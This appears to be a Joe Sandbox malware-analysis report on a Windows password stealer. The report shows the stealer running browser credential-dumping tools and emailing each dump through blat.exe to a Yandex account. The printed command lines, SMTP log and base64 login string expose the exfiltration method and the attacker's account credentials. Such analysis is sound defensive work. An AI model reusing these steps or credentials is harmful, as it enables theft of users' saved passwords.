                                      Nov 20, 2024 18:16:24.355240107 CET49794587192.168.2.477.88.21.158AUTH PLAIN AGFsZXhhbmRyS29uZHJhdGlldjUAcXdlcnR5NQ==
                                      Nov 20, 2024 18:16:24.813040972 CET5874979477.88.21.158192.168.2.4530 5.7.7 Email sending without SSL/TLS encryption is not allowed. Please see: https://yandex.ru/support/mail/mail-clients/ssl.html 1732122984-LGW1jF7OhKo0
                                      Nov 20, 2024 18:16:24.813414097 CET49794587192.168.2.477.88.21.158AUTH LOGIN
                                      Nov 20, 2024 18:16:25.264879942 CET5874979477.88.21.158192.168.2.4530 5.7.7 Email sending without SSL/TLS encryption is not allowed. Please see: https://yandex.ru/support/mail/mail-clients/ssl.html 1732122985-LGW1jF7OhKo0
                                      Nov 20, 2024 18:16:25.265281916 CET49794587192.168.2.477.88.21.158MAIL FROM:<alexandrKondratiev5@yandex.ru>
                                      Nov 20, 2024 18:16:25.713968039 CET5874979477.88.21.158192.168.2.4503 5.5.4 Error: send AUTH command first. 1732122985-LGW1jF7OhKo0-4P6ystnH
                                      Nov 20, 2024 18:16:25.714380026 CET49794587192.168.2.477.88.21.158QUIT
                                      Nov 20, 2024 18:16:26.167982101 CET5874979477.88.21.158192.168.2.4221 2.0.0 Closing connecton
                                      Nov 20, 2024 18:16:30.503196955 CET5874981277.88.21.158192.168.2.4220 mail-nwsmtp-smtp-production-main-57.myt.yp-c.yandex.net Ok 1732122990-TGW0cPeOja60
                                      Nov 20, 2024 18:16:30.503515959 CET49812587192.168.2.477.88.21.158EHLO 927537.yandex.ru
                                      Nov 20, 2024 18:16:30.953548908 CET5874981277.88.21.158192.168.2.4250-mail-nwsmtp-smtp-production-main-57.myt.yp-c.yandex.net
                                      250-8BITMIME
                                      250-PIPELINING
                                      250-SIZE 53477376
                                      250-STARTTLS
                                      250-AUTH LOGIN PLAIN XOAUTH2
                                      250-DSN
                                      250 ENHANCEDSTATUSCODES
                                      Nov 20, 2024 18:16:33.214977026 CET49812587192.168.2.477.88.21.158AUTH PLAIN AGFsZXhhbmRyS29uZHJhdGlldjUAcXdlcnR5NQ==
                                      Nov 20, 2024 18:16:33.667423964 CET5874981277.88.21.158192.168.2.4530 5.7.7 Email sending without SSL/TLS encryption is not allowed. Please see: https://yandex.ru/support/mail/mail-clients/ssl.html 1732122993-TGW0cPeOja60
                                      Nov 20, 2024 18:16:33.667799950 CET49812587192.168.2.477.88.21.158AUTH LOGIN
                                      Nov 20, 2024 18:16:34.116558075 CET5874981277.88.21.158192.168.2.4530 5.7.7 Email sending without SSL/TLS encryption is not allowed. Please see: https://yandex.ru/support/mail/mail-clients/ssl.html 1732122993-TGW0cPeOja60
                                      Nov 20, 2024 18:16:34.116959095 CET49812587192.168.2.477.88.21.158MAIL FROM:<alexandrKondratiev5@yandex.ru>
                                      Nov 20, 2024 18:16:34.750417948 CET5874981277.88.21.158192.168.2.4503 5.5.4 Error: send AUTH command first. 1732122994-TGW0cPeOja60-sZVBQD1y
                                      Nov 20, 2024 18:16:34.750996113 CET49812587192.168.2.477.88.21.158QUIT
                                      Nov 20, 2024 18:16:35.201277971 CET5874981277.88.21.158192.168.2.4221 2.0.0 Closing connecton
                                      Nov 20, 2024 18:16:38.904958010 CET5874983277.88.21.158192.168.2.4220 mail-nwsmtp-smtp-production-main-39.sas.yp-c.yandex.net Ok 1732122998-cGW2qA7OlqM0
                                      Nov 20, 2024 18:16:38.905217886 CET49832587192.168.2.477.88.21.158EHLO 927537.yandex.ru
                                      Nov 20, 2024 18:16:39.358840942 CET5874983277.88.21.158192.168.2.4250-mail-nwsmtp-smtp-production-main-39.sas.yp-c.yandex.net
                                      250-8BITMIME
                                      250-PIPELINING
                                      250-SIZE 53477376
                                      250-STARTTLS
                                      250-AUTH LOGIN PLAIN XOAUTH2
                                      250-DSN
                                      250 ENHANCEDSTATUSCODES
                                      Nov 20, 2024 18:16:41.605813980 CET49832587192.168.2.477.88.21.158AUTH PLAIN AGFsZXhhbmRyS29uZHJhdGlldjUAcXdlcnR5NQ==
                                      Nov 20, 2024 18:16:42.060802937 CET5874983277.88.21.158192.168.2.4530 5.7.7 Email sending without SSL/TLS encryption is not allowed. Please see: https://yandex.ru/support/mail/mail-clients/ssl.html 1732123001-cGW2qA7OlqM0
                                      Nov 20, 2024 18:16:42.061247110 CET49832587192.168.2.477.88.21.158AUTH LOGIN
                                      Nov 20, 2024 18:16:42.519639969 CET5874983277.88.21.158192.168.2.4530 5.7.7 Email sending without SSL/TLS encryption is not allowed. Please see: https://yandex.ru/support/mail/mail-clients/ssl.html 1732123002-cGW2qA7OlqM0
                                      Nov 20, 2024 18:16:42.520215034 CET49832587192.168.2.477.88.21.158MAIL FROM:<alexandrKondratiev5@yandex.ru>
                                      Nov 20, 2024 18:16:42.973721027 CET5874983277.88.21.158192.168.2.4503 5.5.4 Error: send AUTH command first. 1732123002-cGW2qA7OlqM0-wdl07VlR
                                      Nov 20, 2024 18:16:42.974473000 CET49832587192.168.2.477.88.21.158QUIT
                                      Nov 20, 2024 18:16:43.429357052 CET5874983277.88.21.158192.168.2.4221 2.0.0 Closing connecton

                                      Statistics

                                      CPU Usage

                                      Click to jump to process

                                      Memory Usage

                                      Click to jump to process

                                      High Level Behavior Distribution

                                      Click to dive into process behavior distribution

                                      Behavior

                                      Click to jump to process

                                      System Behavior

                                      General

                                      Target ID:0
                                      Start time:12:14:56
                                      Start date:20/11/2024
                                      Path:C:\Users\user\Desktop\0zu73p2YBu.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\Desktop\0zu73p2YBu.exe"
                                      Imagebase:0x400000
                                      File size:642'048 bytes
                                      MD5 hash:29ECA65FFA92A3F877B59DF42E2150ED
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:low
                                      Has exited:true

                                      General

                                      Target ID:1
                                      Start time:12:14:56
                                      Start date:20/11/2024
                                      Path:C:\Users\user\AppData\Local\Temp\ .exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\AppData\Local\Temp\ .exe"
                                      Imagebase:0x400000
                                      File size:565'760 bytes
                                      MD5 hash:6867A307FDB19A4B89696F07FBFB1847
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Antivirus matches:
                                      • Detection: 100%, Joe Sandbox ML
                                      Reputation:low
                                      Has exited:true

                                      General

                                      Target ID:2
                                      Start time:12:14:56
                                      Start date:20/11/2024
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\600.tmp\ip.bat" "
                                      Imagebase:0x240000
                                      File size:236'544 bytes
                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:3
                                      Start time:12:14:56
                                      Start date:20/11/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:8
                                      Start time:12:14:58
                                      Start date:20/11/2024
                                      Path:C:\Windows\SysWOW64\PING.EXE
                                      Wow64 process (32bit):true
                                      Commandline:ping -n 3 127.0.0.1
                                      Imagebase:0x630000
                                      File size:18'944 bytes
                                      MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:9
                                      Start time:12:15:00
                                      Start date:20/11/2024
                                      Path:C:\Users\user\AppData\Local\Temp\600.tmp\OperaPassView.exe
                                      Wow64 process (32bit):true
                                      Commandline:OperaPassView.exe /stext user-PC_OperaPassView.txt
                                      Imagebase:0x400000
                                      File size:40'448 bytes
                                      MD5 hash:8B4AE559AD7836B27EE9F8F171BE8139
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Antivirus matches:
                                      • Detection: 100%, Joe Sandbox ML
                                      • Detection: 61%, ReversingLabs
                                      Reputation:low
                                      Has exited:true

                                      General

                                      Target ID:10
                                      Start time:12:15:00
                                      Start date:20/11/2024
                                      Path:C:\Windows\SysWOW64\PING.EXE
                                      Wow64 process (32bit):true
                                      Commandline:ping -n 3 127.0.0.1
                                      Imagebase:0x630000
                                      File size:18'944 bytes
                                      MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:11
                                      Start time:12:15:03
                                      Start date:20/11/2024
                                      Path:C:\Users\user\AppData\Local\Temp\600.tmp\PasswordFox.exe
                                      Wow64 process (32bit):true
                                      Commandline:PasswordFox.exe /stext user-PC_PasswordFox.txt
                                      Imagebase:0x400000
                                      File size:39'424 bytes
                                      MD5 hash:CC84065F23CFC3D980AAD38EFC648DE6
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_FoxPasswordStealer, Description: Yara detected Fox Password Stealer, Source: 0000000B.00000002.1743739038.0000000000401000.00000040.00000001.01000000.0000000E.sdmp, Author: Joe Security
                                      Antivirus matches:
                                      • Detection: 100%, Avira
                                      • Detection: 100%, Joe Sandbox ML
                                      • Detection: 76%, ReversingLabs
                                      Reputation:low
                                      Has exited:true

                                      General

                                      Target ID:12
                                      Start time:12:15:03
                                      Start date:20/11/2024
                                      Path:C:\Windows\SysWOW64\PING.EXE
                                      Wow64 process (32bit):true
                                      Commandline:ping -n 3 127.0.0.1
                                      Imagebase:0x630000
                                      File size:18'944 bytes
                                      MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:13
                                      Start time:12:15:05
                                      Start date:20/11/2024
                                      Path:C:\Users\user\AppData\Local\Temp\600.tmp\iepv.exe
                                      Wow64 process (32bit):true
                                      Commandline:iepv.exe /stext user-PC_iepv.txt
                                      Imagebase:0x400000
                                      File size:44'544 bytes
                                      MD5 hash:C861FE184E271D6E2BA958DA306BA748
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Antivirus matches:
                                      • Detection: 100%, Avira
                                      • Detection: 100%, Joe Sandbox ML
                                      • Detection: 71%, ReversingLabs
                                      Reputation:low
                                      Has exited:true

                                      General

                                      Target ID:14
                                      Start time:12:15:05
                                      Start date:20/11/2024
                                      Path:C:\Windows\SysWOW64\PING.EXE
                                      Wow64 process (32bit):true
                                      Commandline:ping -n 3 127.0.0.1
                                      Imagebase:0x630000
                                      File size:18'944 bytes
                                      MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:15
                                      Start time:12:15:07
                                      Start date:20/11/2024
                                      Path:C:\Users\user\AppData\Local\Temp\600.tmp\ChromePass.exe
                                      Wow64 process (32bit):true
                                      Commandline:ChromePass.exe /stext user-PC_ChromePass.txt
                                      Imagebase:0x400000
                                      File size:130'048 bytes
                                      MD5 hash:CB271441FA19AC163ECF380C8EBB3109
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Antivirus matches:
                                      • Detection: 61%, ReversingLabs
                                      Has exited:true

                                      General

                                      Target ID:16
                                      Start time:12:15:07
                                      Start date:20/11/2024
                                      Path:C:\Windows\SysWOW64\PING.EXE
                                      Wow64 process (32bit):true
                                      Commandline:ping -n 120 127.0.0.1
                                      Imagebase:0x630000
                                      File size:18'944 bytes
                                      MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:20
                                      Start time:12:16:08
                                      Start date:20/11/2024
                                      Path:C:\Users\user\AppData\Local\Temp\600.tmp\blat.exe
                                      Wow64 process (32bit):true
                                      Commandline:blat.exe -install -server smtp.yandex.ru -port 587 -f alexandrKondratiev5@yandex.ru -u alexandrKondratiev5 -pw qwerty5
                                      Imagebase:0x400000
                                      File size:115'200 bytes
                                      MD5 hash:31F84E433E8D1865E322998A41E6D90E
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Antivirus matches:
                                      • Detection: 8%, ReversingLabs
                                      Has exited:true

                                      General

                                      Target ID:21
                                      Start time:12:16:08
                                      Start date:20/11/2024
                                      Path:C:\Windows\SysWOW64\PING.EXE
                                      Wow64 process (32bit):true
                                      Commandline:ping -n 3 127.0.0.1
                                      Imagebase:0x630000
                                      File size:18'944 bytes
                                      MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:22
                                      Start time:12:16:10
                                      Start date:20/11/2024
                                      Path:C:\Users\user\AppData\Local\Temp\600.tmp\blat.exe
                                      Wow64 process (32bit):true
                                      Commandline:blat.exe -to alexandrKondratiev5@yandex.ru -subject "Opera" -attachi "user-PC_OperaPassView.txt" -body "Opera"
                                      Imagebase:0x7ff70f330000
                                      File size:115'200 bytes
                                      MD5 hash:31F84E433E8D1865E322998A41E6D90E
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:23
                                      Start time:12:16:16
                                      Start date:20/11/2024
                                      Path:C:\Windows\SysWOW64\PING.EXE
                                      Wow64 process (32bit):true
                                      Commandline:ping -n 3 127.0.0.1
                                      Imagebase:0x630000
                                      File size:18'944 bytes
                                      MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:25
                                      Start time:12:16:18
                                      Start date:20/11/2024
                                      Path:C:\Users\user\AppData\Local\Temp\600.tmp\blat.exe
                                      Wow64 process (32bit):true
                                      Commandline:blat.exe -to alexandrKondratiev5@yandex.ru -subject "Fox" -attachi "user-PC_PasswordFox.txt" -body "Fox"
                                      Imagebase:0x400000
                                      File size:115'200 bytes
                                      MD5 hash:31F84E433E8D1865E322998A41E6D90E
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:26
                                      Start time:12:16:24
                                      Start date:20/11/2024
                                      Path:C:\Windows\SysWOW64\PING.EXE
                                      Wow64 process (32bit):true
                                      Commandline:ping -n 3 127.0.0.1
                                      Imagebase:0x630000
                                      File size:18'944 bytes
                                      MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:27
                                      Start time:12:16:27
                                      Start date:20/11/2024
                                      Path:C:\Users\user\AppData\Local\Temp\600.tmp\blat.exe
                                      Wow64 process (32bit):true
                                      Commandline:blat.exe -to alexandrKondratiev5@yandex.ru -subject "ie" -attachi "user-PC_iepv.txt" -body "ie"
                                      Imagebase:0x400000
                                      File size:115'200 bytes
                                      MD5 hash:31F84E433E8D1865E322998A41E6D90E
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:28
                                      Start time:12:16:34
                                      Start date:20/11/2024
                                      Path:C:\Windows\SysWOW64\PING.EXE
                                      Wow64 process (32bit):true
                                      Commandline:ping -n 3 127.0.0.1
                                      Imagebase:0x630000
                                      File size:18'944 bytes
                                      MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:29
                                      Start time:12:16:36
                                      Start date:20/11/2024
                                      Path:C:\Users\user\AppData\Local\Temp\600.tmp\blat.exe
                                      Wow64 process (32bit):true
                                      Commandline:blat.exe -to alexandrKondratiev5@yandex.ru -subject "Chrome" -attachi "user-PC_ChromePass.txt" -body "Chrome"
                                      Imagebase:0x400000
                                      File size:115'200 bytes
                                      MD5 hash:31F84E433E8D1865E322998A41E6D90E
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:30
                                      Start time:12:16:42
                                      Start date:20/11/2024
                                      Path:C:\Windows\SysWOW64\PING.EXE
                                      Wow64 process (32bit):true
                                      Commandline:ping -n 3 127.0.0.1
                                      Imagebase:0x630000
                                      File size:18'944 bytes
                                      MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Disassembly

                                      Reset < >

                                        Execution Graph

                                        Execution Coverage:66%
                                        Dynamic/Decrypted Code Coverage:0%
                                        Signature Coverage:60%
                                        Total number of Nodes:75
                                        Total number of Limit Nodes:14
                                        execution_graph 236 401a10 6 API calls 145 401ad8 GetCommandLineA GetModuleHandleA GetProcessHeap 146 401b0d ExitProcess 145->146 148 401000 6 API calls 145->148 149 4010cc GetMessageA 148->149 150 4010e0 TranslateMessage DispatchMessageA 149->150 151 4010f4 149->151 150->149 151->146 152 4010fb 153 401111 152->153 154 40110a 152->154 156 401117 153->156 157 40112f 153->157 163 4014cb 14 API calls 154->163 202 401340 14 API calls 156->202 160 401142 DefWindowProcA 157->160 161 401135 PostQuitMessage 157->161 162 40111c SendMessageA 162->160 203 401189 FindResourceA 163->203 165 40159b 214 40117e 165->214 170 4015ad FindResourceA 171 4015c2 SizeofResource 170->171 172 4015bd 170->172 171->172 173 4015d8 LoadResource 171->173 174 4019f6 172->174 175 4019ef 172->175 173->172 176 4015f3 LockResource 173->176 178 401a04 ExitProcess 174->178 179 4019ff ExitProcess 174->179 225 401a92 lstrcpyA lstrcatA lstrcatA ShellExecuteA 175->225 176->172 180 401607 GlobalAlloc 176->180 180->172 181 401622 RtlMoveMemory 180->181 183 401674 181->183 182 4019f4 182->178 184 401661 GlobalAlloc 183->184 185 401690 RtlDecompressBuffer 183->185 186 40167d RtlMoveMemory 183->186 184->172 184->183 187 4016b1 GlobalFree lstrcpynA 185->187 186->187 188 401706 lstrcpyA lstrlenA 187->188 200 40171c 187->200 188->200 189 401729 lstrcpyA lstrlenA 189->200 190 4017a7 lstrcpyA PathAddBackslashA lstrcatA 191 4017fa CreateFileA WriteFile 190->191 190->200 192 401935 CloseHandle GlobalFree SetFileAttributesA 191->192 191->200 192->200 193 4017eb lstrcpyA 193->191 195 4019ce FreeResource 195->170 195->172 196 401869 HeapAlloc WriteFile HeapFree 196->192 197 4018b7 CreateFileA GetFileSize CloseHandle 197->192 198 4018f5 HeapAlloc WriteFile HeapFree 197->198 198->192 199 40198c lstrcpyA PathFindFileNameA 199->200 200->189 200->190 200->191 200->192 200->193 200->195 200->196 200->197 200->199 201 4019bc ShellExecuteA 200->201 222 401468 RegCreateKeyExA 200->222 201->195 202->162 204 4011a7 SizeofResource 203->204 206 4011a2 203->206 204->206 207 4011bd LoadResource 204->207 205 401b0d ExitProcess 206->205 207->206 208 4011d8 LockResource 207->208 208->206 209 4011ec RtlMoveMemory 208->209 210 401215 209->210 211 401228 HeapAlloc RtlMoveMemory HeapAlloc RtlMoveMemory 210->211 212 40128b GlobalAlloc RtlMoveMemory FreeResource 210->212 211->212 212->165 212->205 226 401157 GetPEB 214->226 216 401183 230 401169 GetPEB 216->230 219 401a6f 220 4015a5 219->220 221 401a78 MessageBoxA 219->221 220->170 221->220 234 40144a 222->234 224 40149d lstrlenA RegSetValueExA RegCloseKey 224->200 225->182 227 401163 226->227 228 401168 226->228 229 401b0d ExitProcess 227->229 228->216 228->229 231 401178 ExitProcess 230->231 232 40117d 230->232 232->219 235 401454 234->235 235->224 235->235

                                        Callgraph

                                        Executed Functions

                                        Function 004014CB Relevance: 107.1, APIs: 53, Strings: 8, Instructions: 371COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 0 4014cb-4015ab GetSystemDirectoryA PathAddBackslashA GetWindowsDirectoryA PathAddBackslashA GetTempPathA PathAddBackslashA GetModuleFileNameA PathFindFileNameA GetEnvironmentVariableA PathAddBackslashA SHGetSpecialFolderPathA PathAddBackslashA SHGetSpecialFolderPathA PathAddBackslashA call 401189 call 40117e call 401a6f 7 4015ad-4015bb FindResourceA 0->7 8 4015c2-4015d1 SizeofResource 7->8 9 4015bd 7->9 11 4015d3 8->11 12 4015d8-4015ec LoadResource 8->12 10 4019e6-4019ed 9->10 13 4019f6-4019fd 10->13 14 4019ef-4019f4 call 401a92 10->14 11->10 15 4015f3-401600 LockResource 12->15 16 4015ee 12->16 18 401a04-401a06 ExitProcess 13->18 19 4019ff ExitProcess 13->19 14->18 20 401602 15->20 21 401607-40161b GlobalAlloc 15->21 16->10 20->10 22 401622-40166d RtlMoveMemory call 401312 GlobalAlloc 21->22 23 40161d 21->23 27 401674-40167b 22->27 28 40166f 22->28 23->10 29 401690-4016ab RtlDecompressBuffer 27->29 30 40167d-40168e RtlMoveMemory 27->30 28->10 31 4016b1-401704 GlobalFree lstrcpynA 29->31 30->31 32 401706-401719 lstrcpyA lstrlenA 31->32 33 40171c-401727 31->33 32->33 34 401729-40173c lstrcpyA lstrlenA 33->34 35 40173f-401744 33->35 34->35 36 401746-40174c 35->36 37 40174e-401751 35->37 38 4017a7-4017dd lstrcpyA PathAddBackslashA lstrcatA 36->38 39 401753-401759 37->39 40 40175b-40175e 37->40 43 4017fa-40183a CreateFileA WriteFile 38->43 44 4017df-4017e9 38->44 39->38 41 401760-401766 40->41 42 401768-40176b 40->42 41->38 47 401775-401778 42->47 48 40176d-401773 42->48 45 401840-40184a 43->45 46 401935-401959 CloseHandle GlobalFree SetFileAttributesA 43->46 44->43 49 4017eb-4017f5 lstrcpyA 44->49 45->46 50 401850-401857 45->50 53 401965-40196a 46->53 54 40195b-401960 call 401468 46->54 51 401782-401785 47->51 52 40177a-401780 47->52 48->38 49->43 55 401859-401863 50->55 56 4018ae-4018b5 50->56 57 401787-40178d 51->57 58 40178f-401792 51->58 52->38 60 40196c-401972 53->60 61 4019ce-4019e0 FreeResource 53->61 54->53 55->46 62 401869-4018a9 HeapAlloc WriteFile HeapFree 55->62 56->46 63 4018b7-4018f3 CreateFileA GetFileSize CloseHandle 56->63 57->38 64 401794-40179a 58->64 65 40179c-40179f 58->65 66 401974-401976 60->66 67 401978-40197b 60->67 61->7 61->10 62->46 63->46 68 4018f5-401930 HeapAlloc WriteFile HeapFree 63->68 64->38 65->38 69 4017a1 65->69 70 40198c-4019b1 lstrcpyA PathFindFileNameA 66->70 71 401981-401984 67->71 72 40197d-40197f 67->72 68->46 69->38 75 4019b3-4019b8 70->75 76 4019ba 70->76 73 401986-401988 71->73 74 40198a 71->74 72->70 73->70 74->70 77 4019bc-4019c8 ShellExecuteA 75->77 76->77 77->61
                                        APIs
                                        • GetSystemDirectoryA.KERNEL32(C:\Windows\system32\,00001000), ref: 004014DC
                                        • PathAddBackslashA.KERNELBASE(C:\Windows\system32\), ref: 004014E6
                                        • GetWindowsDirectoryA.KERNEL32(00404450,00001000), ref: 004014F6
                                        • PathAddBackslashA.SHLWAPI(00404450,00404450,00001000), ref: 00401500
                                        • GetTempPathA.KERNEL32(00001000,00405450), ref: 00401510
                                        • PathAddBackslashA.SHLWAPI(00405450,00001000,00405450), ref: 0040151A
                                        • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\,00000200), ref: 0040152C
                                        • PathFindFileNameA.SHLWAPI(C:\Users\user\Desktop\,00000000,C:\Users\user\Desktop\,00000200), ref: 00401536
                                        • GetEnvironmentVariableA.KERNEL32(APPDATA,00407450,00001000), ref: 0040154E
                                        • PathAddBackslashA.SHLWAPI(00407450,APPDATA,00407450,00001000), ref: 00401558
                                        • SHGetSpecialFolderPathA.SHELL32(00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\,00000007,00000001), ref: 00401569
                                        • PathAddBackslashA.SHLWAPI(C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\), ref: 00401574
                                        • SHGetSpecialFolderPathA.SHELL32(00000000,00409450,00000010,00000001), ref: 00401585
                                        • PathAddBackslashA.SHLWAPI(00409450), ref: 00401590
                                          • Part of subcall function 00401189: FindResourceA.KERNEL32(00000000,00001001,0000000A), ref: 00401199
                                          • Part of subcall function 00401189: ExitProcess.KERNEL32(00000000,00000000,0000000A,00000000), ref: 00401B0F
                                          • Part of subcall function 00401A6F: MessageBoxA.USER32(00000000,004015A5), ref: 00401A8C
                                        • FindResourceA.KERNEL32(00000000,00000001,0000000A), ref: 004015B4
                                        • SizeofResource.KERNEL32(00000000,00000000,00000000,00000001,0000000A,00000001), ref: 004015CA
                                        • ExitProcess.KERNEL32(?,?,?,?,00410694,00000000,00406450,C0000000,00000003,00000000,00000002,00000080,00000000,00406450,00410060), ref: 004019FF
                                        • ExitProcess.KERNEL32(00000000,?,?,?,?,00410694,00000000,00406450,C0000000,00000003,00000000,00000002,00000080,00000000,00406450,00410060), ref: 00401A06
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1676806976.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1676793353.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1676822719.0000000000402000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1676862014.0000000000403000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1676862014.0000000000408000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1676862014.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1676905599.0000000000411000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1676977396.00000000004AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_0zu73p2YBu.jbxd
                                        Similarity
                                        • API ID: Path$Backslash$ExitFindProcessResource$DirectoryFileFolderNameSpecial$EnvironmentMessageModuleSizeofSystemTempVariableWindows
                                        • String ID: 4UB$APPDATA$C:\Dir1\SubDir$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$C:\Users\user\Desktop\$C:\Windows\system32\$open
                                        • API String ID: 1375885263-934362696
                                        • Opcode ID: 50095d240ff997be04fd6f2d848ced9c49322861209034e3b8e4f945b30697c9
                                        • Instruction ID: e2ab4b508eaebd8f5c656a5e621ccd2c6fa043b933859f919f4585061545147a
                                        • Opcode Fuzzy Hash: 50095d240ff997be04fd6f2d848ced9c49322861209034e3b8e4f945b30697c9
                                        • Instruction Fuzzy Hash: AED13074A84204AEEB11ABA0DD86FAD3775AB54719F20403BF101B61F1D7FD6890DB1D
                                        Function 00401340 Relevance: 47.3, APIs: 14, Strings: 13, Instructions: 53libraryloaderCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                        • LoadLibraryA.KERNEL32(Shell32.dll,0040111C), ref: 00401345
                                        • GetProcAddress.KERNEL32(ShellExecuteA,Shell32.dll), ref: 0040135A
                                        • GetProcAddress.KERNEL32(SHGetSpecialFolderPathA,0040111C), ref: 0040136F
                                        • LoadLibraryA.KERNEL32(shlwapi.dll,SHGetSpecialFolderPathA,0040111C), ref: 0040137E
                                        • GetProcAddress.KERNEL32(PathFindFileNameA,shlwapi.dll), ref: 00401393
                                        • GetProcAddress.KERNEL32(PathAddBackslashA,PathFindFileNameA), ref: 004013A8
                                        • LoadLibraryA.KERNEL32(advapi32.dll,PathAddBackslashA,PathFindFileNameA,shlwapi.dll,SHGetSpecialFolderPathA,0040111C), ref: 004013B7
                                        • GetProcAddress.KERNEL32(RegCreateKeyExA,advapi32.dll), ref: 004013CC
                                        • GetProcAddress.KERNEL32(RegSetValueExA,RegCreateKeyExA), ref: 004013E1
                                        • GetProcAddress.KERNEL32(RegCloseKey,RegSetValueExA), ref: 004013F6
                                        • LoadLibraryA.KERNEL32(ntdll.dll,RegCloseKey,RegSetValueExA,RegCreateKeyExA,advapi32.dll,PathAddBackslashA,PathFindFileNameA,shlwapi.dll,SHGetSpecialFolderPathA,0040111C), ref: 00401405
                                        • GetProcAddress.KERNEL32(RtlDecompressBuffer,ntdll.dll), ref: 0040141A
                                        • GetModuleFileNameA.KERNEL32(00000000,0040B450,00001000,RtlDecompressBuffer,ntdll.dll,RegCloseKey,RegSetValueExA,RegCreateKeyExA,advapi32.dll,PathAddBackslashA,PathFindFileNameA,shlwapi.dll,SHGetSpecialFolderPathA,0040111C), ref: 00401430
